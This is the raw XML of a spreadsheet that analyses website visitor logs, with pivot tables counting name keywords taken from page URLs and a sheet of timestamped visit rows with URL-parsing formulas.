    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="updates"/>
    <s v="updates"/>
    <s v="updates"/>
    <x v="42"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73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Asal Persian"/>
    <s v="Asal Persian"/>
    <s v="asal persian"/>
    <x v="72"/>
  </r>
  <r>
    <s v="tamil-serial-actress"/>
    <s v="tamil-serial-actress"/>
    <s v="tamil-serial-actress"/>
    <x v="74"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Asal Persian"/>
    <s v="Asal Persian"/>
    <s v="asal persian"/>
    <x v="72"/>
  </r>
  <r>
    <s v="Swagatha S Krishnan"/>
    <s v="Swagatha S Krishnan"/>
    <s v="swagatha s krishnan"/>
    <x v="61"/>
  </r>
  <r>
    <s v="Swagatha S Krishnan"/>
    <s v="Swagatha S Krishnan"/>
    <s v="swagatha s krishnan"/>
    <x v="61"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Abhimanika"/>
    <s v="Abhimanika"/>
    <s v="abhimanika"/>
    <x v="75"/>
  </r>
  <r>
    <s v="Seethu"/>
    <s v="Seethu"/>
    <s v="seethu"/>
    <x v="76"/>
  </r>
  <r>
    <s v="Suvitha Rajendran&amp;date=2023-04-15"/>
    <s v="Suvitha Rajendran"/>
    <s v="suvitha rajendran"/>
    <x v="77"/>
  </r>
  <r>
    <s v="Suvitha Rajendran&amp;date=2023-04-15"/>
    <s v="Suvitha Rajendran"/>
    <s v="suvitha rajendran"/>
    <x v="77"/>
  </r>
  <r>
    <s v="Swagatha S Krishnan"/>
    <s v="Swagatha S Krishnan"/>
    <s v="swagatha s krishnan"/>
    <x v="61"/>
  </r>
  <r>
    <s v="Suvitha Rajendran&amp;date=2023-04-15"/>
    <s v="Suvitha Rajendran"/>
    <s v="suvitha rajendran"/>
    <x v="77"/>
  </r>
  <r>
    <s v="Suvitha Rajendran&amp;date=2023-04-15"/>
    <s v="Suvitha Rajendran"/>
    <s v="suvitha rajendran"/>
    <x v="77"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="mumbai-model"/>
    <s v="mumbai-model"/>
    <s v="mumbai-model"/>
    <x v="78"/>
  </r>
  <r>
    <s v="mumbai-model"/>
    <s v="mumbai-model"/>
    <s v="mumbai-model"/>
    <x v="78"/>
  </r>
  <r>
    <s v="updates"/>
    <s v="updates"/>
    <s v="updates"/>
    <x v="42"/>
  </r>
  <r>
    <s v="mumbai-model"/>
    <s v="mumbai-model"/>
    <s v="mumbai-model"/>
    <x v="78"/>
  </r>
  <r>
    <s v="Niveditha Gowda"/>
    <s v="Niveditha Gowda"/>
    <s v="niveditha gowda"/>
    <x v="79"/>
  </r>
  <r>
    <s v="Priyanka Kumar"/>
    <s v="Priyanka Kumar"/>
    <s v="priyanka kumar"/>
    <x v="68"/>
  </r>
  <r>
    <s v="Priyanka Kumar"/>
    <s v="Priyanka Kumar"/>
    <s v="priyanka kumar"/>
    <x v="68"/>
  </r>
  <r>
    <s v="Priyanka Kumar"/>
    <s v="Priyanka Kumar"/>
    <s v="priyanka kumar"/>
    <x v="68"/>
  </r>
  <r>
    <s v="Bidisha Guha"/>
    <s v="Bidisha Guha"/>
    <s v="bidisha guha"/>
    <x v="71"/>
  </r>
  <r>
    <s v="Bidisha Guha"/>
    <s v="Bidisha Guha"/>
    <s v="bidisha guha"/>
    <x v="71"/>
  </r>
  <r>
    <s v="Samyuktha Menon&amp;date=2023-04-15"/>
    <s v="Samyuktha Menon"/>
    <s v="samyuktha menon"/>
    <x v="16"/>
  </r>
  <r>
    <s v="Bidisha Guha"/>
    <s v="Bidisha Guha"/>
    <s v="bidisha guha"/>
    <x v="71"/>
  </r>
  <r>
    <s v="Niveditha Gowda"/>
    <s v="Niveditha Gowda"/>
    <s v="niveditha gowda"/>
    <x v="79"/>
  </r>
  <r>
    <s v="Bidisha Guha"/>
    <s v="Bidisha Guha"/>
    <s v="bidisha guha"/>
    <x v="71"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Bhumi Pednekar"/>
    <s v="Bhumi Pednekar"/>
    <s v="bhumi pednekar"/>
    <x v="14"/>
  </r>
  <r>
    <s v="Bhumi Pednekar"/>
    <s v="Bhumi Pednekar"/>
    <s v="bhumi pednekar"/>
    <x v="14"/>
  </r>
  <r>
    <s v="Bidisha Guha"/>
    <s v="Bidisha Guha"/>
    <s v="bidisha guha"/>
    <x v="71"/>
  </r>
  <r>
    <s v="Bhumi Pednekar"/>
    <s v="Bhumi Pednekar"/>
    <s v="bhumi pednekar"/>
    <x v="14"/>
  </r>
  <r>
    <s v="Suriya Praba"/>
    <s v="Suriya Praba"/>
    <s v="suriya praba"/>
    <x v="43"/>
  </r>
  <r>
    <s v="Suriya Praba"/>
    <s v="Suriya Praba"/>
    <s v="suriya praba"/>
    <x v="43"/>
  </r>
  <r>
    <s v="Dimple Jain 1511&amp;date=2023-04-15"/>
    <s v="Dimple Jain 1511"/>
    <s v="dimple jain 1511"/>
    <x v="80"/>
  </r>
  <r>
    <s v="Juhi Kritika&amp;date=2023-04-14"/>
    <s v="Juhi Kritika"/>
    <s v="juhi kritika"/>
    <x v="81"/>
  </r>
  <r>
    <s v="Suriya Praba"/>
    <s v="Suriya Praba"/>
    <s v="suriya praba"/>
    <x v="43"/>
  </r>
  <r>
    <s v="Suriya Praba"/>
    <s v="Suriya Praba"/>
    <s v="suriya praba"/>
    <x v="43"/>
  </r>
  <r>
    <s v="Niveditha Gowda"/>
    <s v="Niveditha Gowda"/>
    <s v="niveditha gowda"/>
    <x v="79"/>
  </r>
  <r>
    <s v="leonilla-shwetha-dsouza"/>
    <s v="leonilla-shwetha-dsouza"/>
    <s v="leonilla-shwetha-dsouza"/>
    <x v="53"/>
  </r>
  <r>
    <s v="leonilla-shwetha-dsouza"/>
    <s v="leonilla-shwetha-dsouza"/>
    <s v="leonilla-shwetha-dsouza"/>
    <x v="53"/>
  </r>
  <r>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="sruthy renjith vaiga"/>
    <x v="15"/>
  </r>
  <r>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="sruthy renjith vaiga"/>
    <x v="15"/>
  </r>
  <r>
    <s v="Niveditha Gowda"/>
    <s v="Niveditha Gowda"/>
    <s v="niveditha gowda"/>
    <x v="79"/>
  </r>
  <r>
    <s v="uorfi7i"/>
    <s v="uorfi7i"/>
    <s v="uorfi7i"/>
    <x v="82"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Bidisha Guha"/>
    <s v="Bidisha Guha"/>
    <s v="bidisha guha"/>
    <x v="71"/>
  </r>
  <r>
    <s v="Hitesha Chandranee"/>
    <s v="Hitesha Chandranee"/>
    <s v="hitesha chandranee"/>
    <x v="63"/>
  </r>
  <r>
    <s v="Sreenidhi Swaminathan&amp;date=2023-04-14"/>
    <s v="Sreenidhi Swaminathan"/>
    <s v="sreenidhi swaminathan"/>
    <x v="83"/>
  </r>
  <r>
    <s v="Nehal Vadoliya"/>
    <s v="Nehal Vadoliya"/>
    <s v="nehal vadoliya"/>
    <x v="84"/>
  </r>
  <r>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="sruthy renjith vaiga"/>
    <x v="15"/>
  </r>
  <r>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="Sruthy Renjith Vaiga"/>
    <s v="sruthy renjith vaiga"/>
    <x v="15"/>
  </r>
  <r>
    <s v="Priyanka Kumar"/>
    <s v="Priyanka Kumar"/>
    <s v="priyanka kumar"/>
    <x v="68"/>
  </r>
  <r>
    <s v="Priyanka Kumar"/>
    <s v="Priyanka Kumar"/>
    <s v="priyanka kumar"/>
    <x v="68"/>
  </r>
  <r>
    <s v="Sumi Chitra 37"/>
    <s v="Sumi Chitra 37"/>
    <s v="sumi chitra 37"/>
    <x v="73"/>
  </r>
  <r>
    <s v="Suvitha Rajendran&amp;date=2023-04-15"/>
    <s v="Suvitha Rajendran"/>
    <s v="suvitha rajendran"/>
    <x v="77"/>
  </r>
  <r>
    <s v="Suvitha Rajendran&amp;date=2023-04-15"/>
    <s v="Suvitha Rajendran"/>
    <s v="suvitha rajendran"/>
    <x v="77"/>
  </r>
  <r>
    <s v="Ranjani Ramesh"/>
    <s v="Ranjani Ramesh"/>
    <s v="ranjani ramesh"/>
    <x v="85"/>
  </r>
  <r>
    <s v="bigg-boss-ott"/>
    <s v="bigg-boss-ott"/>
    <s v="bigg-boss-ott"/>
    <x v="86"/>
  </r>
  <r>
    <s v="Thejaswini Sharma"/>
    <s v="Thejaswini Sharma"/>
    <s v="thejaswini sharma"/>
    <x v="87"/>
  </r>
  <r>
    <s v="Nehal Vadoliya"/>
    <s v="Nehal Vadoliya"/>
    <s v="nehal vadoliya"/>
    <x v="84"/>
  </r>
  <r>
    <s v="Sreenidhi Swaminathan&amp;date=2023-04-14"/>
    <s v="Sreenidhi Swaminathan"/>
    <s v="sreenidhi swaminathan"/>
    <x v="83"/>
  </r>
  <r>
    <s v="Suriya Praba"/>
    <s v="Suriya Praba"/>
    <s v="suriya praba"/>
    <x v="43"/>
  </r>
  <r>
    <s v="Ashwitha 4 Real"/>
    <s v="Ashwitha 4 Real"/>
    <s v="ashwitha 4 real"/>
    <x v="88"/>
  </r>
  <r>
    <s v="Dilsha Prasannan"/>
    <s v="Dilsha Prasannan"/>
    <s v="dilsha prasannan"/>
    <x v="89"/>
  </r>
  <r>
    <s v="Hitesha Chandranee"/>
    <s v="Hitesha Chandranee"/>
    <s v="hitesha chandranee"/>
    <x v="63"/>
  </r>
  <r>
    <s v="kadambari"/>
    <s v="kadambari"/>
    <s v="kadambari"/>
    <x v="90"/>
  </r>
  <r>
    <s v="Donal Bisht"/>
    <s v="Donal Bisht"/>
    <s v="donal bisht"/>
    <x v="91"/>
  </r>
  <r>
    <s v="Sophie Dee"/>
    <s v="Sophie Dee"/>
    <s v="sophie dee"/>
    <x v="92"/>
  </r>
  <r>
    <s v="Shubha Poonja"/>
    <s v="Shubha Poonja"/>
    <s v="shubha poonja"/>
    <x v="35"/>
  </r>
  <r>
    <s v="Carlotta Champagne"/>
    <s v="Carlotta Champagne"/>
    <s v="carlotta champagne"/>
    <x v="93"/>
  </r>
  <r>
    <s v="Malavika Mohanan&amp;date=2023-04-15"/>
    <s v="Malavika Mohanan"/>
    <s v="malavika mohanan"/>
    <x v="12"/>
  </r>
  <r>
    <s v="nibedita-paal"/>
    <s v="nibedita-paal"/>
    <s v="nibedita-paal"/>
    <x v="94"/>
  </r>
  <r>
    <s v="mimi-bhattacharjee"/>
    <s v="mimi-bhattacharjee"/>
    <s v="mimi-bhattacharjee"/>
    <x v="95"/>
  </r>
  <r>
    <s v="Dimple Hayathi&amp;date=2023-04-15"/>
    <s v="Dimple Hayathi"/>
    <s v="dimple hayathi"/>
    <x v="96"/>
  </r>
  <r>
    <s v="Malavika Mohanan&amp;date=2023-04-15"/>
    <s v="Malavika Mohanan"/>
    <s v="malavika mohanan"/>
    <x v="12"/>
  </r>
  <r>
    <s v="Dilsha Prasannan"/>
    <s v="Dilsha Prasannan"/>
    <s v="dilsha prasannan"/>
    <x v="89"/>
  </r>
  <r>
    <s v="Sreenidhi Swaminathan&amp;date=2023-04-14"/>
    <s v="Sreenidhi Swaminathan"/>
    <s v="sreenidhi swaminathan"/>
    <x v="83"/>
  </r>
  <r>
    <s v="Bhanusri Mehra"/>
    <s v="Bhanusri Mehra"/>
    <s v="bhanusri mehra"/>
    <x v="97"/>
  </r>
  <r>
    <s v="nikita-sharma"/>
    <s v="nikita-sharma"/>
    <s v="nikita-sharma"/>
    <x v="98"/>
  </r>
  <r>
    <s v="Chandrika Passionica 1"/>
    <s v="Chandrika Passionica 1"/>
    <s v="chandrika passionica 1"/>
    <x v="99"/>
  </r>
  <r>
    <s v="Chandrika Passionica 1"/>
    <s v="Chandrika Passionica 1"/>
    <s v="chandrika passionica 1"/>
    <x v="99"/>
  </r>
  <r>
    <s v="Chandrika Passionica 1"/>
    <s v="Chandrika Passionica 1"/>
    <s v="chandrika passionica 1"/>
    <x v="99"/>
  </r>
  <r>
    <s v="%E0%B2%B8%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%B0%E0%B2%BF%E0%B2%B6%E0%B3%8D"/>
    <s v="%E0%B2%B8%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%B0%E0%B2%BF%E0%B2%B6%E0%B3%8D"/>
    <s v="%e0%b2%b8%e0%b2%82%e0%b2%a7%e0%b3%8d%e0%b2%af%e0%b2%be-%e0%b2%b0%e0%b2%bf%e0%b2%b6%e0%b3%8d"/>
    <x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C8EE5-BDC8-4A54-BB77-6799AD2B211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43" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="4">
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" dataField="1" showAll="0" measureFilter="1" sortType="descending">
      <items count="102">
        <item x="45"/>
        <item x="100"/>
        <item x="28"/>
        <item x="75"/>
        <item x="6"/>
        <item x="31"/>
        <item x="40"/>
        <item x="72"/>
        <item x="19"/>
        <item x="88"/>
        <item x="97"/>
        <item x="14"/>
        <item x="71"/>
        <item x="33"/>
        <item x="86"/>
        <item x="9"/>
        <item x="93"/>
        <item x="24"/>
        <item x="99"/>
        <item x="3"/>
        <item x="89"/>
        <item x="96"/>
        <item x="80"/>
        <item x="91"/>
        <item x="44"/>
        <item x="13"/>
        <item x="57"/>
        <item x="39"/>
        <item x="63"/>
        <item x="25"/>
        <item x="2"/>
        <item x="47"/>
        <item x="81"/>
        <item x="90"/>
        <item x="55"/>
        <item x="22"/>
        <item x="64"/>
        <item x="49"/>
        <item x="18"/>
        <item x="53"/>
        <item x="27"/>
        <item x="12"/>
        <item x="50"/>
        <item x="95"/>
        <item x="58"/>
        <item x="60"/>
        <item x="29"/>
        <item x="30"/>
        <item x="78"/>
        <item x="7"/>
        <item x="84"/>
        <item x="94"/>
        <item x="98"/>
        <item x="70"/>
        <item x="79"/>
        <item x="20"/>
        <item x="68"/>
        <item x="37"/>
        <item x="69"/>
        <item x="85"/>
        <item x="32"/>
        <item x="46"/>
        <item x="8"/>
        <item x="21"/>
        <item x="10"/>
        <item x="16"/>
        <item x="62"/>
        <item x="56"/>
        <item x="76"/>
        <item x="66"/>
        <item x="35"/>
        <item x="1"/>
        <item x="92"/>
        <item x="67"/>
        <item x="83"/>
        <item x="51"/>
        <item x="15"/>
        <item x="65"/>
        <item x="4"/>
        <item x="17"/>
        <item x="54"/>
        <item x="34"/>
        <item x="73"/>
        <item x="52"/>
        <item x="11"/>
        <item x="48"/>
        <item x="43"/>
        <item x="77"/>
        <item x="61"/>
        <item x="23"/>
        <item x="74"/>
        <item x="87"/>
        <item x="59"/>
        <item x="36"/>
        <item x="82"/>
        <item x="42"/>
        <item x="41"/>
        <item x="5"/>
        <item x="38"/>
        <item x="0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40">
    <i>
      <x v="62"/>
    </i>
    <i>
      <x v="56"/>
    </i>
    <i>
      <x v="82"/>
    </i>
    <i>
      <x v="12"/>
    </i>
    <i>
      <x v="7"/>
    </i>
    <i>
      <x v="41"/>
    </i>
    <i>
      <x v="25"/>
    </i>
    <i>
      <x v="24"/>
    </i>
    <i>
      <x v="92"/>
    </i>
    <i>
      <x v="86"/>
    </i>
    <i>
      <x v="76"/>
    </i>
    <i>
      <x v="87"/>
    </i>
    <i>
      <x v="65"/>
    </i>
    <i>
      <x v="17"/>
    </i>
    <i>
      <x v="89"/>
    </i>
    <i>
      <x v="11"/>
    </i>
    <i>
      <x v="39"/>
    </i>
    <i>
      <x v="88"/>
    </i>
    <i>
      <x v="70"/>
    </i>
    <i>
      <x v="55"/>
    </i>
    <i>
      <x v="54"/>
    </i>
    <i>
      <x v="95"/>
    </i>
    <i>
      <x v="49"/>
    </i>
    <i>
      <x v="42"/>
    </i>
    <i>
      <x v="29"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="30"/>
    </i>
    <i>
      <x v="100"/>
    </i>
    <i>
      <x v="18"/>
    </i>
    <i>
      <x v="48"/>
    </i>
    <i>
      <x v="74"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="40"/>
    </i>
    <i>
      <x v="93"/>
    </i>
    <i>
      <x v="78"/>
    </i>
    <i>
      <x v="96"/>
    </i>
    <i>
      <x v="81"/>
    </i>
    <i>
      <x v="28"/>
    </i>
    <i>
      <x v="8"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colItems count="1">
    <i/>
  </colItems>
  <dataFields count="1">
    <dataField name="Count of KW_FINAL" fld="3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480429-DFB8-43D9-B016-776D51422CF1}" autoFormatId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="0">
  <queryTableRefresh nextId="6">
    <queryTableFields count="5">
      <queryTableField id="1" name="time" tableColumnId="1"/>
      <queryTableField id="2" name="ip" tableColumnId="2"/>
      <queryTableField id="3" name="url" tableColumnId="3"/>
      <queryTableField id="5" dataBound="0" tableColumnId="6"/>
      <queryTableField id="4" name="refer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B3D108-EB5E-4C85-8ABB-CF3041CB1C46}" name="visitors_indirect" displayName="visitors_indirect" ref="A1:E6928" tableType="queryTable" totalsRowShown="0">
  <autoFilter ref="A1:E6928" xr:uid="{46B3D108-EB5E-4C85-8ABB-CF3041CB1C46}"/>
  <tableColumns count="5">
    <tableColumn id="1" xr3:uid="{E5B460C0-4944-4107-92F1-129411232E74}" uniqueName="1" name="time" queryTableFieldId="1" dataDxfId="6"/>
    <tableColumn id="2" xr3:uid="{16D54500-1753-4653-868E-97367CF5AE5F}" uniqueName="2" name="ip" queryTableFieldId="2" dataDxfId="5"/>
    <tableColumn id="3" xr3:uid="{54D79D0E-41FD-4334-BA4F-4FB2DE6191DB}" uniqueName="3" name="url" queryTableFieldId="3" dataDxfId="4"/>
    <tableColumn id="6" xr3:uid="{078C2B1F-BD45-474B-B087-060D60AC45DD}" uniqueName="6" name="Column1" queryTableFieldId="5" dataDxfId="3">
      <calculatedColumnFormula>MID(C2,FIND("#", SUBSTITUTE(C2, "/", "#", 3))+1,LEN(C2)-FIND("#", SUBSTITUTE(C2, "/", "#", 3))+1)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="4" xr3:uid="{41FD5E94-6BD6-4F9F-B664-C3FEB2BE5454}" uniqueName="4" name="referer" queryTableFieldId="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2669D-B6CA-43F8-965D-9615E0EE7E4F}" name="Table3" displayName="Table3" ref="A1:D305" totalsRowShown="0" tableBorderDxfId="1">
  <autoFilter ref="A1:D305" xr:uid="{F222669D-B6CA-43F8-965D-9615E0EE7E4F}"/>
  <tableColumns count="4">
    <tableColumn id="1" xr3:uid="{00859359-84D2-48ED-AE37-3506C87D68E0}" name="Column1"/>
    <tableColumn id="2" xr3:uid="{0F45B0A1-7988-434F-B184-58B8F2ED8D00}" name="Column2">
      <calculatedColumnFormula>IFERROR(LEFT(A2,FIND("&amp;",A2)-1),A2)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="3" xr3:uid="{6D5CEF7C-5EDC-4956-9CED-ED50CCA188BE}" name="Column3">
      <calculatedColumnFormula>LOWER(B2)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="4" xr3:uid="{42811198-262E-49D2-85D1-D94299F627D1}" name="KW_FINAL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21D62-32E9-46C6-8429-D2CDBB7D270F}">
  <dimension ref="A1:E6928"/>
  <sheetViews>
    <sheetView topLeftCell="D1" workbookViewId="0">
      <selection activeCell="D1" sqref="D1:D1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="15.1796875" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="14.54296875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="80.7265625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="80.7265625" customWidth="1"/>
    <col min="5" max="5" width="80.7265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2247</v>
      </c>
      <c r="E1" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="2" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2" s="1">
        <v>45692.806145833332</v>
      </c>
      <c r="B2" t="s">
        <v>4</v>
      </c>
      <c r="C2" t="s">
        <v>5</v>
      </c>
      <c r="D2" t="str">
        <f t="shared" ref="D2:D65" si="0">MID(C2,FIND("#", SUBSTITUTE(C2, "/", "#", 3))+1,LEN(C2)-FIND("#", SUBSTITUTE(C2, "/", "#", 3))+1)</f>
        <v/>
      </c>
      <c r="E2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="3" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3" s="1">
        <v>45660.846122685187</v>
      </c>
      <c r="B3" t="s">
        <v>7</v>
      </c>
      <c r="C3" t="s">
        <v>5</v>
      </c>
      <c r="D3" t="str">
        <f t="shared" si="0"/>
        <v/>
      </c>
      <c r="E3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4" s="1">
        <v>45660.846122685187</v>
      </c>
      <c r="B4" t="s">
        <v>7</v>
      </c>
      <c r="C4" t="s">
        <v>5</v>
      </c>
      <c r="D4" t="str">
        <f t="shared" si="0"/>
        <v/>
      </c>
      <c r="E4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A5" s="1">
        <v>45583.766458333332</v>
      </c>
      <c r="B5" t="s">
        <v>8</v>
      </c>
      <c r="C5" t="s">
        <v>9</v>
      </c>
      <c r="D5" t="str">
        <f t="shared" si="0"/>
        <v>view_all.php?name=Veronica%20Perasso</v>
      </c>
      <c r="E5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="6" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A6" s="1">
        <v>45583.747870370367</v>
      </c>
      <c r="B6" t="s">
        <v>11</v>
      </c>
      <c r="C6" t="s">
        <v>12</v>
      </c>
      <c r="D6" t="str">
        <f t="shared" si="0"/>
        <v>ss.php</v>
      </c>
      <c r="E6" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="7" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A7" s="1">
        <v>45583.581770833334</v>
      </c>
      <c r="B7" t="s">
        <v>14</v>
      </c>
      <c r="C7" t="s">
        <v>12</v>
      </c>
      <c r="D7" t="str">
        <f t="shared" si="0"/>
        <v>ss.php</v>
      </c>
      <c r="E7" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="8" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A8" s="1">
        <v>45583.398969907408</v>
      </c>
      <c r="B8" t="s">
        <v>15</v>
      </c>
      <c r="C8" t="s">
        <v>12</v>
      </c>
      <c r="D8" t="str">
        <f t="shared" si="0"/>
        <v>ss.php</v>
      </c>
      <c r="E8" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="9" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A9" s="1">
        <v>45583.343240740738</v>
      </c>
      <c r="B9" t="s">
        <v>16</v>
      </c>
      <c r="C9" t="s">
        <v>17</v>
      </c>
      <c r="D9" t="str">
        <f t="shared" si="0"/>
        <v>tag/sofia-ansari/</v>
      </c>
      <c r="E9" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="10" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A10" s="1">
        <v>45582.996018518519</v>
      </c>
      <c r="B10" t="s">
        <v>4</v>
      </c>
      <c r="C10" t="s">
        <v>19</v>
      </c>
      <c r="D10" t="str">
        <f t="shared" si="0"/>
        <v>category/indian-serial-actress/</v>
      </c>
      <c r="E10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="11" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A11" s="1">
        <v>45582.992511574077</v>
      </c>
      <c r="B11" t="s">
        <v>4</v>
      </c>
      <c r="C11" t="s">
        <v>20</v>
      </c>
      <c r="D11" t="str">
        <f t="shared" si="0"/>
        <v>amp/</v>
      </c>
      <c r="E11" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="12" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A12" s="1">
        <v>45582.989756944444</v>
      </c>
      <c r="B12" t="s">
        <v>4</v>
      </c>
      <c r="C12" t="s">
        <v>21</v>
      </c>
      <c r="D12" t="str">
        <f t="shared" si="0"/>
        <v>viewup.php?name=Dhivya%20Duraisamy&amp;date=2023-12-26</v>
      </c>
      <c r="E12" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="13" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A13" s="1">
        <v>45582.989537037036</v>
      </c>
      <c r="B13" t="s">
        <v>4</v>
      </c>
      <c r="C13" t="s">
        <v>22</v>
      </c>
      <c r="D13" t="str">
        <f t="shared" si="0"/>
        <v>view_all.php?name=Style%20With%20Plixxi</v>
      </c>
      <c r="E13" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="14" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A14" s="1">
        <v>45582.987291666665</v>
      </c>
      <c r="B14" t="s">
        <v>4</v>
      </c>
      <c r="C14" t="s">
        <v>19</v>
      </c>
      <c r="D14" t="str">
        <f t="shared" si="0"/>
        <v>category/indian-serial-actress/</v>
      </c>
      <c r="E14" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="15" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A15" s="1">
        <v>45582.986701388887</v>
      </c>
      <c r="B15" t="s">
        <v>4</v>
      </c>
      <c r="C15" t="s">
        <v>23</v>
      </c>
      <c r="D15" t="str">
        <f t="shared" si="0"/>
        <v>viewupdate.php</v>
      </c>
      <c r="E15" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A16" s="1">
        <v>45582.986597222225</v>
      </c>
      <c r="B16" t="s">
        <v>4</v>
      </c>
      <c r="C16" t="s">
        <v>20</v>
      </c>
      <c r="D16" t="str">
        <f t="shared" si="0"/>
        <v>amp/</v>
      </c>
      <c r="E16" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A17" s="1">
        <v>45582.951122685183</v>
      </c>
      <c r="B17" t="s">
        <v>24</v>
      </c>
      <c r="C17" t="s">
        <v>25</v>
      </c>
      <c r="D17" t="str">
        <f t="shared" si="0"/>
        <v>viewup.php?name=Vaibhavi%20Joshi%20777&amp;date=2023-11-05</v>
      </c>
      <c r="E17" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A18" s="1">
        <v>45582.893657407411</v>
      </c>
      <c r="B18" t="s">
        <v>4</v>
      </c>
      <c r="C18" t="s">
        <v>26</v>
      </c>
      <c r="D18" t="str">
        <f t="shared" si="0"/>
        <v>leaderboard.php</v>
      </c>
      <c r="E18" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A19" s="1">
        <v>45582.892291666663</v>
      </c>
      <c r="B19" t="s">
        <v>4</v>
      </c>
      <c r="C19" t="s">
        <v>19</v>
      </c>
      <c r="D19" t="str">
        <f t="shared" si="0"/>
        <v>category/indian-serial-actress/</v>
      </c>
      <c r="E19" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="20" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A20" s="1">
        <v>45582.891712962963</v>
      </c>
      <c r="B20" t="s">
        <v>4</v>
      </c>
      <c r="C20" t="s">
        <v>23</v>
      </c>
      <c r="D20" t="str">
        <f t="shared" si="0"/>
        <v>viewupdate.php</v>
      </c>
      <c r="E20" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="21" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A21" s="1">
        <v>45582.631018518521</v>
      </c>
      <c r="B21" t="s">
        <v>27</v>
      </c>
      <c r="C21" t="s">
        <v>28</v>
      </c>
      <c r="D21" t="str">
        <f t="shared" si="0"/>
        <v>ss.php</v>
      </c>
      <c r="E21" t="s">
        <v>13</v>
      </c>
    </row>
